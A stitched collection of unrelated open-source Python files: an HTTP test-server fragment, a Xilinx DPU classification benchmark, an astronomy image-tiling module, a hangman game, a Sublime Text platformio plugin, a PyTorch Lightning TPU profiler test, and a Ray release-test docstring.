            self.httpd = server_cls((host, port),
                                    handler_cls,
                                    self.router,
                                    self.rewriter,
                                    config=config,
                                    bind_address=bind_address,
                                    ws_doc_root=ws_doc_root,
                                    use_ssl=use_ssl,
                                    key_file=key_file,
                                    certificate=certificate,
                                    encrypt_after_connect=encrypt_after_connect,
                                    latency=latency,
                                    http2=http2)
            self.started = False

            # Retrieve the actual port bound, in case port 0 ("any free
            # port") was requested.
            _host, self.port = self.httpd.socket.getsockname()
        except Exception:
            self.logger.critical("Failed to start HTTP server on port %s; "
                                 "is something already using that port?" % port)
            raise

    def start(self, block=False):
        """Start the server.

        :param block: True to run the server on the current thread, blocking,
                      False to run on a separate thread."""
        http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
        self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
        self.started = True
        if block:
            self.httpd.serve_forever()
        else:
            self.server_thread = threading.Thread(target=self.httpd.serve_forever)
            self.server_thread.daemon = True  # don't hang on exit
            self.server_thread.start()

    def stop(self):
        """
        Stops the server.

        If the server is not running, this method has no effect.
        """
        if self.started:
            try:
                self.httpd.shutdown()
                self.httpd.server_close()
                self.server_thread.join()
                self.server_thread = None
                self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
            except AttributeError:
                # Server was constructed but never successfully started.
                pass
            self.started = False
        self.httpd = None

    def get_url(self, path="/", query=None, fragment=None):
        """Return the server's base URL with *path*, or None if not started."""
        if not self.started:
            return None

        return urlunsplit(("http" if not self.use_ssl else "https",
                           "%s:%s" % (self.host, self.port),
                           path, query, fragment))
class _WebSocketConnection(object):
def __init__(self, request_handler, response):
"""Mimic mod_python mp_conn.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self._request_handler = request_handler
self._response = response
self.remote_addr = self._request_handler.client_address
def write(self, data):
self._response.writer.write_data(data, False)
def read(self, length):
return self._request_handler.rfile.read(length)
class _WebSocketRequest(object):
    """Adapter exposing the mod_python request interface for H2 websockets."""

    def __init__(self, request_handler, response):
        """Mimic mod_python request.

        :param request_handler: A H2HandlerCopy instance.
        :param response: A H2Response instance.
        """
        self._response = response
        self.connection = _WebSocketConnection(request_handler, response)
        self.protocol = "HTTP/2"
        self.uri = request_handler.path
        self.unparsed_uri = request_handler.path
        self.method = request_handler.command

        # read headers from request_handler
        self.headers_in = request_handler.headers
        # write headers directly into H2Response
        self.headers_out = response.headers

    # proxies status to H2Response
    @property
    def status(self):
        return self._response.status

    @status.setter
    def status(self, status):
        self._response.status = status
|
app_mt.py | '''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
import cv2
import numpy as np
import runner
import os
import xir
import pathlib
import vart
import threading
import time
import sys
import argparse
def preprocess_fn(image_path):
    '''
    Image pre-processing.
    Resizes the image to 224x224 (bicubic) then scales pixel values
    to the range 0:1. Note: the BGR->RGB conversion is currently
    disabled (commented out below), so the array keeps OpenCV's
    native BGR channel order.
    input arg: path of image file
    return: numpy array (float, values in [0, 1])
    '''
    image = cv2.imread(image_path)
    #image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    image = cv2.resize(image,(224,224),interpolation=cv2.INTER_CUBIC)
    image = image/255.0
    return image
def get_subgraph (g):
    """Return the DPU subgraphs of graph *g*.

    Walks the topologically sorted children of the root subgraph and keeps
    those whose "device" attribute equals "DPU" (case-insensitive).
    """
    root = g.get_root_subgraph()
    dpu_subgraphs = []
    for child in root.toposort_child_subgraph():
        if child.has_attr("device") and child.get_attr("device").upper() == "DPU":
            dpu_subgraphs.append(child)
    return dpu_subgraphs
def runDPU(id,start,dpu,img):
    """Worker: push pre-processed images through a DPU runner in batches.

    Arguments:
        id    -- worker index (unused in the body; kept for the Thread API)
        start -- first index in the module-global ``out_q`` this worker writes
        dpu   -- runner object for the DPU subgraph
        img   -- list of pre-processed image arrays assigned to this worker

    Output vectors are written into the shared ``out_q`` list; workers write
    disjoint index ranges, so no locking is needed.
    """
    '''get tensor'''
    inputTensors = dpu.get_input_tensors()
    outputTensors = dpu.get_output_tensors()
    shapeIn = tuple(inputTensors[0].dims)
    shapeOut = tuple(outputTensors[0].dims)
    # First dimension of the input tensor is the DPU batch size.
    batchSize = shapeIn[0]

    n_of_images = len(img)
    count = 0
    write_index = start
    while count < n_of_images:
        # The final batch may be smaller than the DPU batch size.
        if (count+batchSize<=n_of_images):
            runSize = batchSize
        else:
            runSize=n_of_images-count

        '''prepare batch input/output '''
        outputData = []
        inputData = []
        outputData = [np.empty(shapeOut, dtype = np.float32, order = 'C')]
        inputData = [np.empty(shapeIn, dtype = np.float32, order = 'C')]

        '''init input image to input buffer '''
        for j in range(runSize):
            imageRun = inputData[0]
            imageRun[j, ...] = img[(count+j)% n_of_images].reshape(shapeIn[1:])

        '''run with batch '''
        job_id = dpu.execute_async(inputData,outputData)
        dpu.wait(job_id)

        '''store output vectors '''
        for j in range(runSize):
            out_q[write_index] = outputData[0][j]
            write_index += 1
        count = count + runSize
def app(image_dir,threads,model):
    """Run the classification benchmark end to end.

    Pre-processes up to 500 images from *image_dir*, fans them out over
    *threads* DPU runner threads for the compiled *model*, then reports
    throughput (FPS) and accuracy against ground truth encoded in each
    filename.
    """
    listimage=os.listdir(image_dir)
    runTotal = len(listimage)
    # Cap the run at 500 images to bound pre-processing time and memory.
    runTotal = min(500,runTotal)

    # Shared output buffer, filled by the runDPU worker threads.
    global out_q
    out_q = [None] * runTotal

    g = xir.Graph.deserialize(model)
    #g = xir.Graph.deserialize('model_dir/dobble.xmodel')
    subgraphs = get_subgraph (g)
    assert len(subgraphs) == 1 # only one DPU kernel
    all_dpu_runners = []
    for i in range(threads):
        all_dpu_runners.append(runner.Runner(subgraphs[0], "run"))

    ''' preprocess images '''
    print('Pre-processing',runTotal,'images...')
    img = []
    for i in range(runTotal):
        path = os.path.join(image_dir,listimage[i])
        #print(i,"/",runTotal,"=",path)
        img.append(preprocess_fn(path))

    '''run threads '''
    print('Starting',threads,'threads...')
    threadAll = []
    start=0
    for i in range(threads):
        # Split the image list as evenly as possible; the last thread takes
        # any remainder.
        if (i==threads-1):
            end = len(img)
        else:
            end = start+(len(img)//threads)
        in_q = img[start:end]
        t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
        threadAll.append(t1)
        start=end

    time1 = time.time()
    for x in threadAll:
        x.start()
    for x in threadAll:
        x.join()
    time2 = time.time()
    timetotal = time2 - time1
    fps = float(runTotal / timetotal)
    print("FPS=%.2f, total frames = %.0f , time=%.4f seconds" %(fps,runTotal, timetotal))

    ''' post-processing '''
    #classes = ['airplane','automobile','bird','cat','deer','dog','frog','horse','ship','truck']
    correct = 0
    wrong = 0
    print('output buffer length:',len(out_q))
    for i in range(len(out_q)):
        argmax = np.argmax((out_q[i]))
        #prediction = classes[argmax]
        prediction = argmax
        # Ground truth is parsed from the filename: the second-to-last
        # '_'-separated token is expected to look like "cardNN".
        #ground_truth, _ = listimage[i].split('_')
        path_split = listimage[i].split('_')
        card = path_split[len(path_split)-2]
        ground_truth = int( card[4:] )
        #print(path_split,card,ground_truth)
        #print(card,ground_truth,prediction)
        if (ground_truth==prediction):
            correct += 1
        else:
            wrong += 1
            #print("[ERROR] ",listimage[i]," detected as ",prediction)
    accuracy = correct/len(out_q)
    print('Correct:',correct,'Wrong:',wrong,'Accuracy:', accuracy)
# only used if script is run as 'main' from command line
def main():
    """Parse command-line options and launch the benchmark app."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--image_dir', type=str, default='images',
                        help='Path to folder of images. Default is images')
    parser.add_argument('-t', '--threads', type=int, default=1,
                        help='Number of threads. Default is 1')
    parser.add_argument('-m', '--model', type=str, default='model_dir/dobble.xmodel',
                        help='Path of .elf. Default is model_dir/dobble.xmodel')
    args = parser.parse_args()

    # Echo the effective options back to the user.
    print ('Command line options:')
    print (' --image_dir : ', args.image_dir)
    print (' --threads : ', args.threads)
    print (' --model : ', args.model)

    app(args.image_dir,args.threads,args.model)

if __name__ == '__main__':
    main()
|
multi_wcs.py | # -*- mode: python; coding: utf-8 -*-
# Copyright 2020-2021 the AAS WorldWide Telescope project
# Licensed under the MIT License.
"""
Generate tiles from a collection of images with associated WCS coordinate
systems.
This module has the following Python package dependencies:
- astropy
- reproject
- shapely (to optimize the projection in reproject)
"""
__all__ = '''
MultiWcsProcessor
'''.split()
import numpy as np
from tqdm import tqdm
import warnings
from .image import Image, ImageDescription, ImageMode
from .study import StudyTiling
class MultiWcsDescriptor(object):
    """Bookkeeping for one input image's place in the global mosaic.

    All attributes are filled in by
    ``MultiWcsProcessor.compute_global_pixelization``.
    """

    # Identifier of the input (its collection_id).
    ident = None
    # (ny, nx) shape of the input image.
    in_shape = None
    # WCS of the input image.
    in_wcs = None

    # Pixel bounds of the input's footprint within the combined mosaic.
    imin = None
    imax = None
    jmin = None
    jmax = None

    # Sub-tiling covering that footprint in the global study tiling.
    sub_tiling = None
class MultiWcsProcessor(object):
    """Tile a collection of WCS-tagged images into a single study pyramid.

    The processor computes one global tangential projection that covers all
    inputs, then reprojects each input onto its sub-region of that mosaic
    and writes the result into the tile pyramid, either serially or with a
    pool of worker processes.
    """

    def __init__(self, collection):
        # `collection` must provide descriptions() and images() yielding
        # items in the same order (they are zipped together in tile()).
        self._collection = collection

    def compute_global_pixelization(self, builder):
        """Compute the combined WCS and tiling covering every input.

        Populates ``self._descs``, ``self._combined_wcs``,
        ``self._combined_shape``, ``self._tiling`` and ``self._n_todo``,
        applies the tiling/WCS info to *builder*, and returns ``self`` for
        chaining. Raises if any input falls outside, or maps to zero size
        within, the global mosaic.
        """
        from reproject.mosaicking.wcs_helpers import find_optimal_celestial_wcs

        # Load up current WCS information for all of the inputs
        def create_mwcs_descriptor(coll_desc):
            desc = MultiWcsDescriptor()
            desc.ident = coll_desc.collection_id
            desc.in_shape = coll_desc.shape
            desc.in_wcs = coll_desc.wcs
            return desc

        self._descs = [create_mwcs_descriptor(d) for d in self._collection.descriptions()]

        # Compute the optimal tangential tiling that fits all of them. Since WWT
        # tilings must be done in a negative-parity coordinate system, we use an
        # ImageDescription helper to ensure we get that.
        wcs, shape = find_optimal_celestial_wcs(
            ((desc.in_shape, desc.in_wcs) for desc in self._descs),
            auto_rotate = True,
            projection = 'TAN',
        )
        desc = ImageDescription(wcs=wcs, shape=shape)
        desc.ensure_negative_parity()
        self._combined_wcs = desc.wcs
        self._combined_shape = desc.shape
        height, width = self._combined_shape
        self._tiling = StudyTiling(width, height)
        self._tiling.apply_to_imageset(builder.imgset)
        builder.apply_wcs_info(self._combined_wcs, width, height)

        # While we're here, figure out how each input will map onto the global
        # tiling. This makes sure that nothing funky happened during the
        # computation and allows us to know how many tiles we'll have to visit.
        self._n_todo = 0

        for desc in self._descs:
            # XXX: this functionality is largely copied from
            # `reproject.mosaicking.coadd.reproject_and_coadd`, and redundant
            # with it, but it's sufficiently different that I think the best
            # approach is to essentially fork the implementation.

            # Figure out where this array lands in the mosaic.
            ny, nx = desc.in_shape
            xc = np.array([-0.5, nx - 0.5, nx - 0.5, -0.5])
            yc = np.array([-0.5, -0.5, ny - 0.5, ny - 0.5])
            xc_out, yc_out = self._combined_wcs.world_to_pixel(desc.in_wcs.pixel_to_world(xc, yc))

            if np.any(np.isnan(xc_out)) or np.any(np.isnan(yc_out)):
                raise Exception(f'segment {desc.ident} does not fit within the global mosaic')

            desc.imin = max(0, int(np.floor(xc_out.min() + 0.5)))
            desc.imax = min(self._combined_shape[1], int(np.ceil(xc_out.max() + 0.5)))
            desc.jmin = max(0, int(np.floor(yc_out.min() + 0.5)))
            desc.jmax = min(self._combined_shape[0], int(np.ceil(yc_out.max() + 0.5)))

            # Compute the sub-tiling now so that we can count how many total
            # tiles we'll need to process.
            if desc.imax < desc.imin or desc.jmax < desc.jmin:
                raise Exception(f'segment {desc.ident} maps to zero size in the global mosaic')

            desc.sub_tiling = self._tiling.compute_for_subimage(
                desc.imin,
                desc.jmin,
                desc.imax - desc.imin,
                desc.jmax - desc.jmin,
            )

            self._n_todo += desc.sub_tiling.count_populated_positions()

        return self # chaining convenience

    def tile(self, pio, reproject_function, parallel=None, cli_progress=False, **kwargs):
        """
        Tile!!!!

        Parameters
        ----------
        pio : :class:`toasty.pyramid.PyramidIO`
            A :class:`~toasty.pyramid.PyramidIO` instance to manage the I/O with
            the tiles in the tile pyramid.
        reproject_function : callable
            The function used to reproject each input onto its sub-region of
            the global mosaic. It is called as
            ``reproject_function((array, wcs), output_projection=...,
            shape_out=..., return_footprint=False, **kwargs)``.
        parallel : integer or None (the default)
            The level of parallelization to use. If unspecified, defaults to using
            all CPUs. If the OS does not support fork-based multiprocessing,
            parallel processing is not possible and serial processing will be
            forced. Pass ``1`` to force serial processing.
        cli_progress : optional boolean, defaults False
            If true, a progress bar will be printed to the terminal using tqdm.

        """
        from .par_util import resolve_parallelism
        parallel = resolve_parallelism(parallel)

        if parallel > 1:
            self._tile_parallel(pio, reproject_function, cli_progress, parallel, **kwargs)
        else:
            self._tile_serial(pio, reproject_function, cli_progress, **kwargs)

        # Since we used `pio.update_image()`, we should clean up the lockfiles
        # that were generated.
        pio.clean_lockfiles(self._tiling._tile_levels)

    def _tile_serial(self, pio, reproject_function, cli_progress, **kwargs):
        # Serial implementation: reproject and tile each input in turn on
        # this process.
        invert_into_tiles = pio.get_default_vertical_parity_sign() == 1

        with tqdm(total=self._n_todo, disable=not cli_progress) as progress:
            for image, desc in zip(self._collection.images(), self._descs):
                # XXX: more copying from
                # `reproject.mosaicking.coadd.reproject_and_coadd`.
                wcs_out_indiv = self._combined_wcs[desc.jmin:desc.jmax, desc.imin:desc.imax]
                shape_out_indiv = (desc.jmax - desc.jmin, desc.imax - desc.imin)
                array = reproject_function(
                    (image.asarray(), image.wcs),
                    output_projection=wcs_out_indiv,
                    shape_out=shape_out_indiv,
                    return_footprint=False,
                    **kwargs
                )
                image = Image.from_array(array.astype(np.float32))

                for pos, width, height, image_x, image_y, tile_x, tile_y in desc.sub_tiling.generate_populated_positions():
                    # Because we are doing an arbitrary WCS reprojection anyway,
                    # we can ensure that our source image is stored with a
                    # top-down vertical data layout, AKA negative image parity,
                    # which is what the overall "study" coordinate system needs.
                    # But if we're writing to FITS format tiles, those need to
                    # end up with a bottoms-up format. So we need to flip the
                    # vertical orientation of how we put the data into the tile
                    # buffer.
                    if invert_into_tiles:
                        flip_tile_y1 = 255 - tile_y
                        flip_tile_y0 = flip_tile_y1 - height

                        if flip_tile_y0 == -1:
                            flip_tile_y0 = None # with a slice, -1 does the wrong thing

                        by_idx = slice(flip_tile_y1, flip_tile_y0, -1)
                    else:
                        by_idx = slice(tile_y, tile_y + height)

                    iy_idx = slice(image_y, image_y + height)
                    ix_idx = slice(image_x, image_x + width)
                    bx_idx = slice(tile_x, tile_x + width)

                    with pio.update_image(pos, masked_mode=image.mode, default='masked') as basis:
                        image.update_into_maskable_buffer(basis, iy_idx, ix_idx, by_idx, bx_idx)

                    progress.update(1)

        if cli_progress:
            print()

    def _tile_parallel(self, pio, reproject_function, cli_progress, parallel, **kwargs):
        # Parallel implementation: worker processes pull (image, descriptor,
        # sub-WCS) work items off a bounded queue; see _mp_tile_worker.
        import multiprocessing as mp

        # Start up the workers

        queue = mp.Queue(maxsize = 2 * parallel)
        workers = []

        for _ in range(parallel):
            w = mp.Process(target=_mp_tile_worker, args=(queue, pio, reproject_function, kwargs))
            w.daemon = True
            w.start()
            workers.append(w)

        # Send out them segments

        with tqdm(total=len(self._descs), disable=not cli_progress) as progress:
            for image, desc in zip(self._collection.images(), self._descs):
                wcs_out_indiv = self._combined_wcs[desc.jmin:desc.jmax, desc.imin:desc.imax]
                queue.put((image, desc, wcs_out_indiv))
                progress.update(1)

            # Closing the queue signals the workers to drain and exit.
            queue.close()

            for w in workers:
                w.join()

        if cli_progress:
            print()
def _mp_tile_worker(queue, pio, reproject_function, kwargs):
    """
    Worker-process loop: pull (image, descriptor, sub-WCS) work items off
    *queue*, reproject each image onto its sub-region of the global mosaic,
    and write the result into the tile pyramid via *pio*. Exits when the
    queue is closed/exhausted.
    """
    from queue import Empty

    invert_into_tiles = pio.get_default_vertical_parity_sign() == 1

    while True:
        try:
            # un-pickling WCS objects always triggers warnings right now
            with warnings.catch_warnings():
                warnings.simplefilter('ignore')
                image, desc, wcs_out_indiv = queue.get(True, timeout=1)
        except (OSError, ValueError, Empty):
            # OSError or ValueError => queue closed. This signal seems not to
            # cross multiprocess lines, though.
            break

        shape_out_indiv = (desc.jmax - desc.jmin, desc.imax - desc.imin)

        array = reproject_function(
            (image.asarray(), image.wcs),
            output_projection=wcs_out_indiv,
            shape_out=shape_out_indiv,
            return_footprint=False,
            **kwargs
        )
        image = Image.from_array(array.astype(np.float32))

        for pos, width, height, image_x, image_y, tile_x, tile_y in desc.sub_tiling.generate_populated_positions():
            # See _tile_serial for the rationale behind this vertical flip
            # when writing into bottoms-up (e.g. FITS) tiles.
            if invert_into_tiles:
                flip_tile_y1 = 255 - tile_y
                flip_tile_y0 = flip_tile_y1 - height

                if flip_tile_y0 == -1:
                    flip_tile_y0 = None # with a slice, -1 does the wrong thing

                by_idx = slice(flip_tile_y1, flip_tile_y0, -1)
            else:
                by_idx = slice(tile_y, tile_y + height)

            iy_idx = slice(image_y, image_y + height)
            ix_idx = slice(image_x, image_x + width)
            bx_idx = slice(tile_x, tile_x + width)

            with pio.update_image(pos, masked_mode=image.mode, default='masked') as basis:
                image.update_into_maskable_buffer(basis, iy_idx, ix_idx, by_idx, bx_idx)
|
hangman.py | import random
from bs4 import BeautifulSoup
import urllib.request
import requests
def display_hangman(tries):
    """Return ASCII art of the gallows for the given number of remaining tries.

    ``tries`` counts remaining chances: index 6 is the empty gallows and
    index 0 the fully drawn (lost) figure.

    NOTE(review): the art's internal indentation appears to have been lost
    in this copy of the file; the gallows will render left-aligned.
    """
    stages = [
        """
--------
| |
| O
| \\|/
| |
| / \\
-
""",
        """
--------
| |
| O
| \\|/
| |
| /
-
""",
        """
--------
| |
| O
| \\|/
| |
|
-
""",
        """
--------
| |
| O
| \\|
| |
|
-
""",
        """
--------
| |
| O
| |
| |
|
-
""",
        """
--------
| |
| O
|
|
|
-
""",
        """
--------
| |
|
|
|
|
-
"""
    ]
    return stages[tries]
def hangman(tally):
    """Play one interactive round of hangman.

    Arguments:
        tally -- two-element list [tries_remaining, points]; mutated in
                 place and also returned. tally[0] == 0 afterwards means
                 the game ended (loss or win state consumed).

    The player guesses letters one at a time; repeating an already-wrong
    letter does not cost an extra try. Entering '0' saves and exits the
    round with the current tally.
    """
    words=['malayalam','tomato','pumpkin','moon','goat']
    # NOTE(review): this randint result is unused — random.choice below
    # picks the word.
    x=random.randint(0,len(words)-1)
    a=random.choice(words)
    #a=a.decode('utf-8')
    a=a.lower()
    # b is the masked word shown to the player, '_' for unguessed letters.
    b=str()
    print('Your word is: ', end= ' ')
    for i in range (0, len(a)):
        b= b+'_'
        print(b[i] ,end= ' ')
    guess=[]
    wrong=[]
    points=tally[1]
    tries=tally[0]
    while(tries>0):
        print("\nYour guesses so far:",guess)
        print('\n\nYou have ' +str(tries)+' chances to guess the word')
        x=input("Enter 0 to stop this game or Enter an alphabet: ")
        if(x=='0'):
            # Player chose to stop; fall through to return the saved tally.
            break
        if(len(x)!=1):
            print("Enter only a single alphabet")
            continue
        if(x.isalpha()==False):
            print("Enter a valid alphabet")
            continue
        x= x.lower()
        guess.append(x)
        # buffer: letter matched at least once; buffer1: letter was already
        # a known wrong guess; found: same as buffer (kept for the message).
        buffer=0
        buffer1=0
        found=0
        for i in range (0,len(a)):
            if(a[i]==x):
                found=1
                buffer=1
                # Strings are immutable: rebuild b with the letter revealed.
                b=list(b)
                b[i]=x
                b="".join(b)
                points=points+1
        if(buffer==1):
            print("Correct guess :)")
            for j in range (0, len(b)):
                print(b[j] ,end= ' ')
        if(found==0):
            print("Incorrect guess, try harder!!")
            for j in range (0, len(b)):
                print(b[j] ,end= ' ')
        if(buffer==0):
            # Only lose a try the first time a wrong letter is guessed.
            if x in wrong:
                buffer1=1
            if(buffer1==0):
                print(display_hangman(tries-1))
                tries=tries-1
                wrong.append(x)
        # Win check: no '_' left means the whole word is revealed.
        buf=0
        for i in range(0, len(b)):
            if(b[i]=='_'):
                buf=1
        if(buf==0):
            print('\nYou have guessed the word with ' + str(tries) +' chances left \n'+ str(points)+' points\n\n')
            tally[0]=tries
            tally[1]=points
            return tally
    if(tries==0):
        print('You lost. Better luck next time! \n Your word was: '+a+'\nYour points are: '+str(points))
        print(a)
        tally[0]=0
        tally[1]=points
        return tally
# --- interactive entry point ---------------------------------------------
print('HANGMAN')
# tally = [tries_remaining, points]; [0, 0] means "no saved game".
tally=[0,0]
while True:
    x=input('Press:\n 1.To play a new game \n 2. Continue existing game \n 3. Exit\n')
    if(x=='1'):
        # Fresh game: 7 tries, 0 points.
        tally=[7,0]
        tally= hangman(tally)
    elif(x=='2'):
        if(tally[0]==0):
            print('There is no saved game, here is a new one\n')
            tally[0]=7
            tally[1]=0
        tally=hangman(tally)
    elif(x=='3'):
        exit()
    else:
        print("Enter a valid response ")

# NOTE(review): everything below is unreachable — the loop above only exits
# via exit(), which terminates the process. If it ever did run,
# Thread(target=hangman) would raise TypeError because hangman() requires a
# `tally` argument (it would need args=([7, 0],)). Consider deleting.
import time
import threading
t = threading.Thread(target=hangman)
t.daemon = True
t.start()
time.sleep(6)
|
initialize.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from ..api import deviot
from ..libraries.project_check import ProjectCheck
from ..libraries.tools import save_sysetting, get_setting
from ..libraries.messages import Messages
class Initialize(ProjectCheck):
    """
    Runs the init command to start working with a new board

    To initialize a new folder you need to know the board id
    and pass it as an argument to the class

    Initialize(board_id)

    The code will run in a new thread to avoid blocking the
    execution of Sublime Text while platformio is working
    """

    def __init__(self):
        super(Initialize, self).__init__()

        self.init_option = None

        # Output panel used to stream platformio's progress to the user.
        messages = Messages()
        messages.initial_text('_deviot_starting{0}', deviot.version())
        messages.create_panel()

        self.init(messages=messages)
        self.print = messages.print

    def add_board(self):
        """New Board

        Adds a new board to the environments of platformio;
        the new board will be stored in the platformio.ini
        file and will be used with the plugin

        Returns:
            bool/None -- True if the board was already initialized;
                         None when no board is selected, or after
                         running the init command for a new board
        """
        self.check_board_selected()
        if(not self.board_id):
            return

        envs = self.get_envs_initialized()
        if(envs and self.board_id in envs):
            return True

        # NOTE(review): '-b ' carries a trailing space — confirm platformio
        # tolerates it before changing it.
        cmd = ['init', '-b ', self.board_id]
        self.run_command(cmd)

        self.structurize_project()

    def nonblock_add_board(self):
        """New Thread Execution

        Starts a new thread to run the add_board method so Sublime Text's
        UI is not blocked while platformio works
        """
        from threading import Thread

        thread = Thread(target=self.add_board)
        thread.start()

    def after_complete(self):
        """At complete

        This method runs after completing a compilation or uploading
        a sketch. You should only put a function or a method here
        """
        pio_untouch = get_setting('pio_untouch', False)

        if(pio_untouch):
            # remove lib_extra_dirs option
            self.add_option('lib_extra_dirs', wipe=True)
            # remove programmer flags
            self.programmer(wipe=True)
            # remove upload_speed
            self.add_option('upload_speed', wipe=True)

        # none last action
        save_sysetting('last_action', None)
|
test_xla_profiler.py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from multiprocessing import Event, Process
import pytest
from pytorch_lightning import Trainer
from pytorch_lightning.profiler import XLAProfiler
from pytorch_lightning.utilities import _TORCH_GREATER_EQUAL_1_8, _TPU_AVAILABLE
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
if _TPU_AVAILABLE:
import torch_xla.utils.utils as xu
if _TORCH_GREATER_EQUAL_1_8:
import torch_xla.debug.profiler as xp
@RunIf(tpu=True)
def test_xla_profiler_instance(tmpdir):
    """Smoke test: profiler="xla" resolves to an XLAProfiler and training runs."""
    net = BoringModel()
    trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True, profiler="xla", accelerator="tpu", devices=8)

    assert isinstance(trainer.profiler, XLAProfiler)

    trainer.fit(net)
    assert trainer.state.finished, f"Training failed with {trainer.state}"
@pytest.mark.skipif(True, reason="XLA Profiler doesn't support Prog. capture yet")
def test_xla_profiler_prog_capture(tmpdir):
    """Programmatic capture: train in a subprocess and trace it over TCP.

    Starts training in a child process, waits for it to signal readiness,
    then attaches the XLA profiler trace client and checks that an
    ``.xplane.pb`` trace file was produced.
    """
    import glob

    port = xu.get_free_tcp_ports()[0]
    training_started = Event()

    def train_worker():
        model = BoringModel()
        trainer = Trainer(default_root_dir=tmpdir, max_epochs=4, profiler="xla", accelerator="tpu", devices=8)
        # Signal the parent before fitting; previously the event was never
        # set, so the wait() below always burned the full 120s timeout.
        training_started.set()
        trainer.fit(model)

    p = Process(target=train_worker, daemon=True)
    p.start()
    training_started.wait(120)

    logdir = str(tmpdir)
    xp.trace(f"localhost:{port}", logdir, duration_ms=2000, num_tracing_attempts=5, delay_ms=1000)

    p.terminate()

    # `os.isfile` does not exist, and a literal "*" component would never
    # match a real path anyway — expand the wildcards with glob and assert
    # that at least one trace file was written.
    assert glob.glob(os.path.join(logdir, "plugins", "profile", "*", "*.xplane.pb"))
|
e2e.py | """
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in a s3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
5. Add your test in release/.buildkite/build_pipeline.py.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built once.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
For local testing, make sure to authenticate with the ray-ossci AWS user
(e.g. by setting the respective environment variables obtained from go/aws),
or use the `--no-report` command line argument.
Also make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --no-report --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The `--no-report` option disables storing the results in the DB and
artifacts on S3. If you set this option, you do not need access to the
ray-ossci AWS user.
Using Compilation on Product + App Config Override
--------------------------------------------------
For quick iteration when debugging a release test, go/compile-on-product allows
you to easily modify and recompile Ray, such that the recompilation happens
within an app build step and can benefit from a warm Bazel cache. See
go/compile-on-product for more information.
After kicking off the app build, you can give the app config ID to this script
as an app config override, where the indicated app config will be used instead
of the app config given in the test config. E.g., running
python e2e.py --no-report --test-config ~/ray/benchmarks/benchmark_tests.yaml --test-name=single_node --app-config-id-override=apt_TBngEXXXrhipMXgexVcrpC9i
would run the single_node benchmark test with the apt_TBngEXXXrhipMXgexVcrpC9i
app config instead of the app config given in
~/ray/benchmarks/benchmark_tests.yaml. If the build for the app config is still
in progress, the script will wait until it completes, same as for a locally
defined app config.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
